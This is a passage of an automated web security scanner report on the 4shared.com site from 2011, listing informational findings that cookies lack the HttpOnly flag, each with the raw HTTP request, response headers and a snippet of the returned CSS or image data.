Date: Fri, 29 Jul 2011 14:01:48 GMT

GIF89a..~...........................................................................................<U........dO..................d}..2....t..E`.h.....n.....<T.....U8...............Wi....x............
...[SNIP]...

6.18. http://www.4shared.com/css/common.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/css/common.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=1161423513; Expires=Mon, 26-Jul-2021 13:59:31 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /css/common.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:59:31 GMT; Path=/
Set-Cookie: hostid=1161423513; Expires=Mon, 26-Jul-2021 13:59:31 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 13:59:31 GMT
ETag: W/"12973-1311929454000"
Last-Modified: Fri, 29 Jul 2011 08:50:54 GMT
Content-Type: text/css
Content-Length: 12973
Date: Fri, 29 Jul 2011 13:59:30 GMT

body {padding: 0px; background: #FFFFFF; margin:0px;
font-family: Helvetica, Arial, Tahoma, "Trebuchet MS",sans-serif; font-size:12px; color:#585b55}

.back-white {width:830px; margin:auto; backgr
...[SNIP]...

6.19. http://www.4shared.com/css/index.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/css/index.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=657966881; Expires=Mon, 26-Jul-2021 14:07:42 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /css/index.css?ver=5756 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:07:42 GMT; Path=/
Set-Cookie: hostid=657966881; Expires=Mon, 26-Jul-2021 14:07:42 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:07:42 GMT
ETag: W/"15771-1295256530000"
Last-Modified: Mon, 17 Jan 2011 09:28:50 GMT
Content-Type: text/css
Content-Length: 15771
Date: Fri, 29 Jul 2011 14:07:42 GMT

body {margin: 0px; padding: 0px; background: #4E4F53; height: 100%;}

img, a:link img, a:visited img {border-style: none}
a img {color: #FFFFFF}

.absmid {vertical-align:middle}

form {margin:0
...[SNIP]...

6.20. http://www.4shared.com/css/lang/style-ms.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/css/lang/style-ms.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=1523296321; Expires=Mon, 26-Jul-2021 14:09:47 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /css/lang/style-ms.css?ver=5756 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:09:47 GMT; Path=/
Set-Cookie: hostid=1523296321; Expires=Mon, 26-Jul-2021 14:09:47 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:09:47 GMT
ETag: W/"77-1305634966000"
Last-Modified: Tue, 17 May 2011 12:22:46 GMT
Content-Type: text/css
Content-Length: 77
Date: Fri, 29 Jul 2011 14:09:47 GMT

/*Bahasa Melayu*/
h1.tagline {width:180px}

.bottom div.awrd {left:335px}

6.21. http://www.4shared.com/css/lang/style-ru.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/css/lang/style-ru.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=1223343799; Expires=Mon, 26-Jul-2021 14:05:06 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /css/lang/style-ru.css?ver=5756 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:05:06 GMT; Path=/
Set-Cookie: hostid=1223343799; Expires=Mon, 26-Jul-2021 14:05:06 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:05:06 GMT
ETag: W/"231-1311851860000"
Last-Modified: Thu, 28 Jul 2011 11:17:40 GMT
Content-Type: text/css
Content-Length: 231
Date: Fri, 29 Jul 2011 14:05:06 GMT

/*russian*/
h1.tagline {width:205px}

.page_d1 .btnprem, #dAllPopAbtn {font:bold 14px/34px Arial,sans-serif}

#subscribeUnsubscribe {width:76px}

/*FT-80*/
#shareTable #link, #shareTable #ad
...[SNIP]...

6.22. http://www.4shared.com/css/mainWithoutCommon.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/css/mainWithoutCommon.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=-1627894845; Expires=Mon, 26-Jul-2021 13:59:31 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /css/mainWithoutCommon.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:59:31 GMT; Path=/
Set-Cookie: hostid=-1627894845; Expires=Mon, 26-Jul-2021 13:59:31 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 13:59:31 GMT
ETag: W/"8450-1305634966000"
Last-Modified: Tue, 17 May 2011 12:22:46 GMT
Content-Type: text/css
Content-Length: 8450
Date: Fri, 29 Jul 2011 13:59:31 GMT

.head {width:792px}

h2 {font:bold 21px "Trebuchet MS"; color:#1370a0; text-transform:uppercase; margin-top:0px}
h3 {font:bold 16px "Trebuchet MS"; color:#b02b11; text-transform:uppercase;}
h3:first-l
...[SNIP]...

6.23. http://www.4shared.com/css/style.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/css/style.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=-473064029; Expires=Mon, 26-Jul-2021 13:59:28 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /css/style.css?ver=5756 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:59:28 GMT; Path=/
Set-Cookie: hostid=-473064029; Expires=Mon, 26-Jul-2021 13:59:28 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 13:59:28 GMT
ETag: W/"36317-1311929454000"
Last-Modified: Fri, 29 Jul 2011 08:50:54 GMT
Content-Type: text/css
Content-Length: 36317
Date: Fri, 29 Jul 2011 13:59:28 GMT

body {margin: 0; padding: 0; background: AppWorkspace; height: 100%;font-family:Helvetica,Arial,sans-serif;}
html {height: 100%;}

img, a:link img, a:visited img {border-style: none}
a img {color:
...[SNIP]...

6.24. http://www.4shared.com/desktop/images/scr3_new.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/desktop/images/scr3_new.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=-1575612922; Expires=Mon, 26-Jul-2021 14:00:28 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /desktop/images/scr3_new.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:00:28 GMT; Path=/
Set-Cookie: hostid=-1575612922; Expires=Mon, 26-Jul-2021 14:00:28 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:00:28 GMT
ETag: W/"28458-1295256536000"
Last-Modified: Mon, 17 Jan 2011 09:28:56 GMT
Content-Type: image/gif
Content-Length: 28458
Date: Fri, 29 Jul 2011 14:00:27 GMT

GIF89a..O...............4..............."8.4.....^6..........g....d................e.~...[...........8......c........................a.S............p|.R.....q.............`f|...........fkR............
...[SNIP]...

6.25. http://www.4shared.com/desktop/images/scr4.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/desktop/images/scr4.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=-1286110689; Expires=Mon, 26-Jul-2021 14:00:28 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /desktop/images/scr4.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:00:28 GMT; Path=/
Set-Cookie: hostid=-1286110689; Expires=Mon, 26-Jul-2021 14:00:28 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:00:28 GMT
ETag: W/"13671-1295256538000"
Last-Modified: Mon, 17 Jan 2011 09:28:58 GMT
Content-Type: image/gif
Content-Length: 13671
Date: Fri, 29 Jul 2011 14:00:27 GMT

GIF89a..............X.........a.'................S...a..L.....r..^...Y .....`.T....U.................U.......g...H.....h....zyx.-...........T,...n.Gjic........]......lr....YXT..._w.FFC4H...8......(..w
...[SNIP]...

6.26. http://www.4shared.com/desktop/images/scr5.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/desktop/images/scr5.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=-2002651489; Expires=Mon, 26-Jul-2021 14:00:28 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /desktop/images/scr5.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:00:28 GMT; Path=/
Set-Cookie: hostid=-2002651489; Expires=Mon, 26-Jul-2021 14:00:28 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:00:28 GMT
ETag: W/"12805-1295256538000"
Last-Modified: Mon, 17 Jan 2011 09:28:58 GMT
Content-Type: image/gif
Content-Length: 12805
Date: Fri, 29 Jul 2011 14:00:27 GMT

GIF89aw...............1j..Y..~r...............EEDg{.YYX.0.k...d..........;........lll....E.....U.::9....j............./d.V..!R.....V.}~~......qqrb.BA?.rR..|...(t..U...t.........D.D.........'''.}.|...
...[SNIP]...

6.27. http://www.4shared.com/desktop/images/scr6.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/desktop/images/scr6.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=2049103533; Expires=Mon, 26-Jul-2021 14:00:28 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /desktop/images/scr6.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:00:28 GMT; Path=/
Set-Cookie: hostid=2049103533; Expires=Mon, 26-Jul-2021 14:00:28 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:00:28 GMT
ETag: W/"10588-1295256538000"
Last-Modified: Mon, 17 Jan 2011 09:28:58 GMT
Content-Type: image/gif
Content-Length: 10588
Date: Fri, 29 Jul 2011 14:00:27 GMT

GIF89a..............j..Y..........y.....:....c......oR.c..U.ZYS.I.....V.......zyvjhb...Zd.. .*t.<..:95...SRK.......S+}zn......ed].d.MLF....:..............a.............*)&:F.....T...........*.....k..
...[SNIP]...

6.28. http://www.4shared.com/developer/developer.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/developer/developer.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=-1799129586; Expires=Mon, 26-Jul-2021 13:59:32 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /developer/developer.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:59:32 GMT; Path=/
Set-Cookie: hostid=-1799129586; Expires=Mon, 26-Jul-2021 13:59:32 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 13:59:32 GMT
ETag: W/"6068-1305634966000"
Last-Modified: Tue, 17 May 2011 12:22:46 GMT
Content-Type: text/css
Content-Length: 6068
Date: Fri, 29 Jul 2011 13:59:32 GMT

.centered {margin: 2px auto auto;
width: 817px;
/* 30% of cool are being achieved with Lucida Grande font :)*/
font-family:"Lucida Grande", Helvetica, Arial, sans-serif;

}
.promoHeader {
...[SNIP]...

6.29. http://www.4shared.com/developer/images/devices.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/developer/images/devices.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=1887864838; Expires=Mon, 26-Jul-2021 14:00:26 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /developer/images/devices.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:00:26 GMT; Path=/
Set-Cookie: hostid=1887864838; Expires=Mon, 26-Jul-2021 14:00:26 GMT; Path=/
ETag: W/"62587-1299339830000"
Last-Modified: Sat, 05 Mar 2011 15:43:50 GMT
Content-Type: image/png
Content-Length: 62587
Date: Fri, 29 Jul 2011 14:00:25 GMT

.PNG
.
...IHDR...F............:....tEXtSoftware.Adobe ImageReadyq.e<....IDATx.....$W}&....|.o.p'GMR.Q. ..$..
..,...I~.~.wmv.YX.={ml?c..x....e....H...Aq4...|s..................3.......|..g!.D...V,."
...[SNIP]...

6.30. http://www.4shared.com/developer/images/footer-corner.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/developer/images/footer-corner.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=1996775946; Expires=Mon, 26-Jul-2021 14:00:28 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /developer/images/footer-corner.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:00:28 GMT; Path=/
Set-Cookie: hostid=1996775946; Expires=Mon, 26-Jul-2021 14:00:28 GMT; Path=/
ETag: W/"500-1299339830000"
Last-Modified: Sat, 05 Mar 2011 15:43:50 GMT
Content-Type: image/png
Content-Length: 500
Date: Fri, 29 Jul 2011 14:00:28 GMT

.PNG
.
...IHDR.......$.....A.23....tEXtSoftware.Adobe ImageReadyq.e<....IDATx....n.P.E..*(.F.:...%..8.y.'.......{...&..^..8 .....V....~...g%I.......T.a.Hw&t].C.A...S.N...X..`.^#..c..d H..j..g.f..$.
...[SNIP]...

6.31. http://www.4shared.com/developer/images/title.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/developer/images/title.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=1229403741; Expires=Mon, 26-Jul-2021 14:00:26 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /developer/images/title.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:00:26 GMT; Path=/
Set-Cookie: hostid=1229403741; Expires=Mon, 26-Jul-2021 14:00:26 GMT; Path=/
ETag: W/"8184-1299339830000"
Last-Modified: Sat, 05 Mar 2011 15:43:50 GMT
Content-Type: image/png
Content-Length: 8184
Date: Fri, 29 Jul 2011 14:00:25 GMT

.PNG
.
...IHDR...h...;.....V..8....tEXtSoftware.Adobe ImageReadyq.e<....IDATx..=m...u.....u.......%A..h.0......)r..M.(...A..n..P.,.q..q.Iia.q.;..(. ...X..]...S+>....P..sLW...A....}C.R{.....,.N.'..G
...[SNIP]...

6.32. http://www.4shared.com/enter.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/enter.jsp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ausk=Sdt45IRrRqsiuJEj; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
ausk=Sdt45IRrRqsiuJEj; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

6.33. http://www.4shared.com/images/1.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/1.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=-777753564; Expires=Mon, 26-Jul-2021 14:07:55 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/1.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:07:55 GMT; Path=/
Set-Cookie: hostid=-777753564; Expires=Mon, 26-Jul-2021 14:07:55 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:07:55 GMT
ETag: W/"249-1295256542000"
Last-Modified: Mon, 17 Jan 2011 09:29:02 GMT
Content-Type: image/gif
Content-Length: 249
Date: Fri, 29 Jul 2011 14:07:54 GMT

GIF89a...............................................................................t{......................!.......,..........v.#...0P...C....i......a$2.E.hXX..H......$.t....S@.P.2F$..v.<.."h..U+f.t
...[SNIP]...

6.34. http://www.4shared.com/images/2.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/2.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=-1089794149; Expires=Mon, 26-Jul-2021 14:08:04 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/2.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:08:04 GMT; Path=/
Set-Cookie: hostid=-1089794149; Expires=Mon, 26-Jul-2021 14:08:04 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:08:04 GMT
ETag: W/"415-1295256542000"
Last-Modified: Mon, 17 Jan 2011 09:29:02 GMT
Content-Type: image/gif
Content-Length: 415
Date: Fri, 29 Jul 2011 14:08:04 GMT

GIF89a................z.....................................{................................{........z...............................z........................................................t{.....
...[SNIP]...

6.35. http://www.4shared.com/images/3.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/3.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=-1550842980; Expires=Mon, 26-Jul-2021 14:09:52 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/3.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:09:52 GMT; Path=/
Set-Cookie: hostid=-1550842980; Expires=Mon, 26-Jul-2021 14:09:52 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:09:52 GMT
ETag: W/"399-1295256542000"
Last-Modified: Mon, 17 Jan 2011 09:29:02 GMT
Content-Type: image/gif
Content-Length: 399
Date: Fri, 29 Jul 2011 14:09:52 GMT

GIF89a............................z.......................{..{..................................................................................................t{......................................
...[SNIP]...

6.36. http://www.4shared.com/images/4.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/4.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=-513556585; Expires=Mon, 26-Jul-2021 14:07:56 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/4.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:07:56 GMT; Path=/
Set-Cookie: hostid=-513556585; Expires=Mon, 26-Jul-2021 14:07:56 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:07:56 GMT
ETag: W/"403-1295256542000"
Last-Modified: Mon, 17 Jan 2011 09:29:02 GMT
Content-Type: image/gif
Content-Length: 403
Date: Fri, 29 Jul 2011 14:07:55 GMT

GIF89a.....1.......................................................................................................{..{........{............................................t{..........................
...[SNIP]...

6.37. http://www.4shared.com/images/bg10.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/bg10.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=172001427; Expires=Mon, 26-Jul-2021 13:59:34 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/bg10.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
